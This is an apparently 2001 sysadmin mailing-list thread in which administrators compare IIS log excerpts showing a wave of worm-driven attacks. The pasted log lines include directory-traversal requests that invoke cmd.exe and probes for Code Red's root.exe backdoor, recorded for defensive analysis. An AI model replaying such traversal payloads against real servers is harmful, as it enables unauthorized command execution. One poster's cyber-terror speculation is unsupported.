I know that some of these attack attempts seem to be searching for the
code red backdoors, for instance these lines:
GET, /winnt/system32/cmd.exe, /c+dir,
GET, /scripts/root.exe, /c+dir
GET, /MSADC/root.exe, /c+dir,
use the backdoor created by Code Red. At this point it seems more and
more likely there is some kind of Code Red mutation that is causing
this. The thing that frightens me is the timing in relation to the other
terror attacks. Is this a prelude to a cyber-terror attack?? I am going
to start locking my systems down( not that they werent already) just in
case and I suggest everyone else do the same.
xylog
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
CodeRed seems to have dwindled to nothing on my logs. But it's being
replaced with the EXACT same lines you have below, and they stay
consistent
with the code red 2 methods of attacking the more local subnets.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert
Yes. It seems to be systems I have previously monitored hitting me with
codered attacks. I bet someone is activating all of their children.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert
All my public facing web servers at home and at my office have shown a
huge continuous hacking activity. Has anyone seen similar? I fear this
may be code red related or automated. Please comment if you have seen
similar. Here is an excerpt from one logfile:
63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/..��../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70,
604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15,
80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
97, 604, 404, 3, GET, /scripts/..��../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0,
100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70,
604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70,
604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /scripts/..��../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172,
41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential,
and
are intended solely for the use of the individual or entity to whom this
e-mail is addressed. If you are not one of the named recipient(s) or
otherwise have reason to believe that you have received this message in
error, please notify the sender at the above e-mail address and delete
this
message immediately from your computer. Any other use, retention,
dissemination, forwarding, printing or copying of this e-mail is
strictly
prohibited.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential,
and
are intended solely for the use of the individual or entity to whom this
e-mail is addressed. If you are not one of the named recipient(s) or
otherwise have reason to believe that you have received this message in
error, please notify the sender at the above e-mail address and delete
this
message immediately from your computer. Any other use, retention,
dissemination, forwarding, printing or copying of this e-mail is
strictly
prohibited.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
